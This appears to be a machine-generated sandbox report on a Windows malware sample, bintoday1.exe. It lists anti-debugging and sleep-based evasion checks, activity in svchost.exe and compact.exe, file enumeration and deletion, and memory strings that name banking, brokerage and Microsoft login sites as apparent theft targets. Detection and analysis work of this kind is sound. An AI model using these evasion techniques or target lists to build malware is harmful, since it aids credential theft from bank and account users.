Source: C:\Windows\SysWOW64\compact.exe	API/Special instruction interceptor: Address: 7FFDB442D1E4
Source: C:\Windows\SysWOW64\compact.exe	API/Special instruction interceptor: Address: 7FFDB4430154
Source: C:\Windows\SysWOW64\compact.exe	API/Special instruction interceptor: Address: 7FFDB442DA44

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0307096E rdtsc

2_2_0307096E

Source: C:\Windows\SysWOW64\compact.exe	Window / User API: threadDelayed 814			Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Window / User API: threadDelayed 9158			Jump to behavior

Source: C:\Users\user\Desktop\bintoday1.exe	API coverage: 4.1 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\compact.exe	API coverage: 2.6 %

Source: C:\Windows\SysWOW64\compact.exe TID: 4876	Thread sleep count: 814 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe TID: 4876	Thread sleep time: -1628000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe TID: 4876	Thread sleep count: 9158 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe TID: 4876	Thread sleep time: -18316000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe TID: 2832	Thread sleep time: -45000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\compact.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\compact.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\bintoday1.exe	Code function: 0_2_00BFDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00BFDBBE
Source: C:\Users\user\Desktop\bintoday1.exe	Code function: 0_2_00BCC2A2 FindFirstFileExW,	0_2_00BCC2A2
Source: C:\Users\user\Desktop\bintoday1.exe	Code function: 0_2_00C068EE FindFirstFileW,FindClose,	0_2_00C068EE
Source: C:\Users\user\Desktop\bintoday1.exe	Code function: 0_2_00C0698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_00C0698F
Source: C:\Users\user\Desktop\bintoday1.exe	Code function: 0_2_00BFD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00BFD076
Source: C:\Users\user\Desktop\bintoday1.exe	Code function: 0_2_00BFD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00BFD3A9
Source: C:\Users\user\Desktop\bintoday1.exe	Code function: 0_2_00C09642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00C09642
Source: C:\Users\user\Desktop\bintoday1.exe	Code function: 0_2_00C0979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00C0979D
Source: C:\Users\user\Desktop\bintoday1.exe	Code function: 0_2_00C09B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00C09B2B
Source: C:\Users\user\Desktop\bintoday1.exe	Code function: 0_2_00C05C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_00C05C97
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_004EC570 FindFirstFileW,FindNextFileW,FindClose,	7_2_004EC570

Source: C:\Users\user\Desktop\bintoday1.exe

Code function: 0_2_00B942DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00B942DE

Source: 5E-50o.7.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: 5E-50o.7.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: 5E-50o.7.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: 5E-50o.7.dr	Binary or memory string: discord.comVMware20,11696487552f
Source: 5E-50o.7.dr	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: 5E-50o.7.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: 5E-50o.7.dr	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: 5E-50o.7.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: 5E-50o.7.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: 5E-50o.7.dr	Binary or memory string: global block list test formVMware20,11696487552
Source: 5E-50o.7.dr	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: firefox.exe, 0000000B.00000002.2758799659.000001CA19E7D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 5E-50o.7.dr	Binary or memory string: AMC password management pageVMware20,11696487552
Source: 5E-50o.7.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: 5E-50o.7.dr	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: 5E-50o.7.dr	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: 5E-50o.7.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: 5E-50o.7.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: 5E-50o.7.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: 5E-50o.7.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: 5E-50o.7.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: 5E-50o.7.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: 5E-50o.7.dr	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: 5E-50o.7.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: 5E-50o.7.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: 5E-50o.7.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: 5E-50o.7.dr	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: 5E-50o.7.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: 5E-50o.7.dr	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: 5E-50o.7.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: compact.exe, 00000007.00000002.4015509843.00000000006FD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllL
Source: eypfpUNFpbLX.exe, 00000009.00000002.4022393648.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll=
Source: 5E-50o.7.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: 5E-50o.7.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0307096E rdtsc

2_2_0307096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_00487A63 LdrLoadDll,

2_2_00487A63

Source: C:\Users\user\Desktop\bintoday1.exe

Code function: 0_2_00C0EAA2 BlockInput,

0_2_00C0EAA2

Source: C:\Users\user\Desktop\bintoday1.exe

Code function: 0_2_00BC2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00BC2622

Source: C:\Users\user\Desktop\bintoday1.exe

Code function: 0_2_00B942DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00B942DE

Source: C:\Users\user\Desktop\bintoday1.exe	Code function: 0_2_00BB4CE8 mov eax, dword ptr fs:[00000030h]	0_2_00BB4CE8
Source: C:\Users\user\Desktop\bintoday1.exe	Code function: 0_2_03343460 mov eax, dword ptr fs:[00000030h]	0_2_03343460
Source: C:\Users\user\Desktop\bintoday1.exe	Code function: 0_2_033434C0 mov eax, dword ptr fs:[00000030h]	0_2_033434C0
Source: C:\Users\user\Desktop\bintoday1.exe	Code function: 0_2_03341E70 mov eax, dword ptr fs:[00000030h]	0_2_03341E70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h]	2_2_0306A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h]	2_2_0306A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h]	2_2_0306A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302C310 mov ecx, dword ptr fs:[00000030h]	2_2_0302C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03050310 mov ecx, dword ptr fs:[00000030h]	2_2_03050310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]	2_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]	2_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]	2_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B035C mov ecx, dword ptr fs:[00000030h]	2_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]	2_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]	2_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FA352 mov eax, dword ptr fs:[00000030h]	2_2_030FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D8350 mov ecx, dword ptr fs:[00000030h]	2_2_030D8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D437C mov eax, dword ptr fs:[00000030h]	2_2_030D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h]	2_2_0302E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h]	2_2_0302E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h]	2_2_0302E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305438F mov eax, dword ptr fs:[00000030h]	2_2_0305438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305438F mov eax, dword ptr fs:[00000030h]	2_2_0305438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03028397 mov eax, dword ptr fs:[00000030h]	2_2_03028397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03028397 mov eax, dword ptr fs:[00000030h]	2_2_03028397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03028397 mov eax, dword ptr fs:[00000030h]	2_2_03028397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030EC3CD mov eax, dword ptr fs:[00000030h]	2_2_030EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]	2_2_030383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]	2_2_030383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]	2_2_030383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]	2_2_030383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B63C0 mov eax, dword ptr fs:[00000030h]	2_2_030B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h]	2_2_030DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h]	2_2_030DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE3DB mov ecx, dword ptr fs:[00000030h]	2_2_030DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h]	2_2_030DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D43D4 mov eax, dword ptr fs:[00000030h]	2_2_030D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D43D4 mov eax, dword ptr fs:[00000030h]	2_2_030D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]	2_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]	2_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]	2_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]	2_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]	2_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]	2_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]	2_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]	2_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0304E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0304E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0304E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030663FF mov eax, dword ptr fs:[00000030h]	2_2_030663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302823B mov eax, dword ptr fs:[00000030h]	2_2_0302823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B8243 mov eax, dword ptr fs:[00000030h]	2_2_030B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B8243 mov ecx, dword ptr fs:[00000030h]	2_2_030B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302A250 mov eax, dword ptr fs:[00000030h]	2_2_0302A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03036259 mov eax, dword ptr fs:[00000030h]	2_2_03036259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030EA250 mov eax, dword ptr fs:[00000030h]	2_2_030EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030EA250 mov eax, dword ptr fs:[00000030h]	2_2_030EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03034260 mov eax, dword ptr fs:[00000030h]	2_2_03034260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03034260 mov eax, dword ptr fs:[00000030h]	2_2_03034260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03034260 mov eax, dword ptr fs:[00000030h]	2_2_03034260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302826B mov eax, dword ptr fs:[00000030h]	2_2_0302826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E284 mov eax, dword ptr fs:[00000030h]	2_2_0306E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E284 mov eax, dword ptr fs:[00000030h]	2_2_0306E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h]	2_2_030B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h]	2_2_030B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h]	2_2_030B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]	2_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C62A0 mov ecx, dword ptr fs:[00000030h]	2_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]	2_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]	2_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]	2_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]	2_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]	2_2_030402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]	2_2_030402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]	2_2_030402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]	2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]	2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]	2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]	2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]	2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]	2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]	2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]	2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]	2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]	2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DA118 mov ecx, dword ptr fs:[00000030h]	2_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]	2_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]	2_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]	2_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F0115 mov eax, dword ptr fs:[00000030h]	2_2_030F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03060124 mov eax, dword ptr fs:[00000030h]	2_2_03060124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]	2_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]	2_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C4144 mov ecx, dword ptr fs:[00000030h]	2_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]	2_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]	2_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302C156 mov eax, dword ptr fs:[00000030h]	2_2_0302C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C8158 mov eax, dword ptr fs:[00000030h]	2_2_030C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03036154 mov eax, dword ptr fs:[00000030h]	2_2_03036154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03036154 mov eax, dword ptr fs:[00000030h]	2_2_03036154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03070185 mov eax, dword ptr fs:[00000030h]	2_2_03070185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030EC188 mov eax, dword ptr fs:[00000030h]	2_2_030EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030EC188 mov eax, dword ptr fs:[00000030h]	2_2_030EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D4180 mov eax, dword ptr fs:[00000030h]	2_2_030D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D4180 mov eax, dword ptr fs:[00000030h]	2_2_030D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]	2_2_030B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]	2_2_030B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]	2_2_030B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]	2_2_030B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]	2_2_0302A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]	2_2_0302A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]	2_2_0302A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F61C3 mov eax, dword ptr fs:[00000030h]	2_2_030F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F61C3 mov eax, dword ptr fs:[00000030h]	2_2_030F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE1D0 mov ecx, dword ptr fs:[00000030h]	2_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031061E5 mov eax, dword ptr fs:[00000030h]	2_2_031061E5
